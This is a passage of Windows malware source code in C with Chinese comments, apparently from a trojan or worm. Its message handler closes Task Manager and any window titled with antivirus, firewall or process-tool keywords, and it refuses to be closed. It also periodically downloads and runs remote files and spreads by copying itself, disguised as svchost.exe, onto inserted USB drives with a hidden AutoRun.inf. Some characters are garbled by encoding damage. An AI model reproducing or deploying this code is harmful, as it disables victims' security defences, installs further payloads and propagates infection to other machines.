case WM_CREATE:
SetTimer(hWnd,1,1000,NULL); //设置一个1号定时器,时间间隔为1秒。
SetTimer(hWnd,2,modify_data.WaitTime*60*1000,NULL); //设置一个2号定时器,时间间隔为20分钟。
break;
case WM_TIMER:
{
if(wParam==1) //1号定时器处理,关闭杀毒窗口
{
if (!modify_data.IsAnti)
break;

//设置注册表
//if (modify_data.IsReg)
{
Register();
}

char hstr[MAX_PATH];
char str[MAX_PATH];

POINT CurPoint;
HWND hCurrent,hParent;
GetCursorPos(&amt;CurPoint);
hCurrent=WindowFromPoint(CurPoint); //取得鼠标所在的窗口句柄
hParent=hCurrent;
while(GetParent(hParent)!=NULL)
hParent=GetParent(hParent); //h为最上层的窗口句柄

//测试是否有windows 任务管理器打开了。若有，则杀死！
if(FindWindow(NULL,"Windows 任务管理器")!=NULL)
PostMessage(FindWindow(NULL,"Windows 任务管理器"),WM_DESTROY,0,0);

//hCurrent为鼠标所在的窗口句柄。h为鼠标所在的窗口最高层的窗口句柄.
GetWindowText(hParent,str,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU！
GetWindowText(hCurrent,hstr,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU！
if((strstr(str,"安全卫士") ||
strstr(str,"扫描") ||
strstr(str,"专杀") ||
strstr(str,"注册表") ||
strstr(str,"Process") ||
strstr(str,"进程") ||
strstr(str,"毒") ||
strstr(str,"木马") ||
strstr(str,"防御") ||
strstr(str,"防火墙") ||
strstr(hstr,"病毒")||
strstr(hstr,"检测")||
strstr(hstr,"Firewall")||
strstr(hstr,"virus") ||
strstr(hstr,"anti")||
strstr(hstr,"金山")||
strstr(hstr,"江民")||
strstr(hstr,"卡巴斯基")||
strstr(hstr,"worm")||
strstr(hstr,"杀毒"))
&amt;&amt; hCurrent)
{//多搞几次，以防有漏网之鱼
PostMessage(hCurrent,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口
PostMessage(hParent,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口
PostMessage(hCurrent,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口
PostMessage(hParent,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口
}
}
else if(wParam==2) //2号定时器处理,下载文件并运行
{
if(GetDownFileDate(modify_data.DownFile,DownFileDate2))//可以下载
{
if (strncmp(DownFileDate1,DownFileDate2,8)!=0)//下载列表时间不一样
{//表示需要下载文件
//DownFiles(modify_data.DownFile);
DownExec(modify_data.DownFile);
strcpy(DownFileDate1,DownFileDate2);
}
}
}
}
break;
case WM_DEVICECHANGE://USB设备消息
if(modify_data.IsUpan)
OnDeviceChange(hWnd,wParam,lParam);
break;
case WM_CLOSE:
return FALSE; //不允许关闭该程序。
case WM_DESTROY:
return FALSE; //不能推毁该程序。
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}

//--------------Begin U盘传播----------------------------
BOOL CreateAutoRunFile(char*name,char *path)
{
FILE *out;
out=fopen(path,"w+");
if(out)
{
fprintf(out,"[AutoRun]\r\n");
// fprintf(out,"open=>s\r\n",name);
fprintf(out,"shell\open=打开(&amt;O)\r\n",name);
fprintf(out,"shell\open\Command=>s\r\n",name);
fprintf(out,"shell\open\Default=1\r\n",name);
fprintf(out,"shell\explore=资源管理器(&amt;X)\r\n",name);
fprintf(out,"shell\\explore\\command=>s\r\n",name);
fclose(out);
return TRUE;
}
else
return FALSE;
}

char FirstDriveFromMask(ULONG unitmask)
{
char i;
for (i = 0; i < 26; ++i)
{
if (unitmask &amt; 0x1)//看该驱动器的状态是否发生了变化
break;
unitmask = unitmask >> 1;
}
return (i + 'A');
}

BOOL SetFileAttrib(char *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}

BOOL CopyToUAndSet(char *U)
{
char This_File[256];
memset(This_File,0,sizeof(This_File));
::GetSystemDirectory(This_File,sizeof(This_File));
strcat(This_File,"\\IME\\svchost.exe");

char szPath[40];
sprintf(szPath,">c:\\setup.exe",U[0]);//得到指向U盘的完整目录
char szAutoFile[40];
sprintf(szAutoFile,">c:\\AutoRun.inf",U[0]);
if(CreateAutoRunFile("setup.exe",szAutoFile))
SetFileAttrib(szAutoFile);
if(!CopyFile(This_File,szPath,FALSE))
return FALSE;
return SetFileAttrib(szPath);
}

LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
char U[4];
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
switch(wParam)
{
case DBT_DEVICEARRIVAL: //插入
if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盘盘符
CopyToUAndSet(U);//拷到u盘
}
break;
case DBT_DEVICEREMOVECOMPLETE: //设备删除
break;
}
return LRESULT();
}
//--------------End U盘传播----------------------------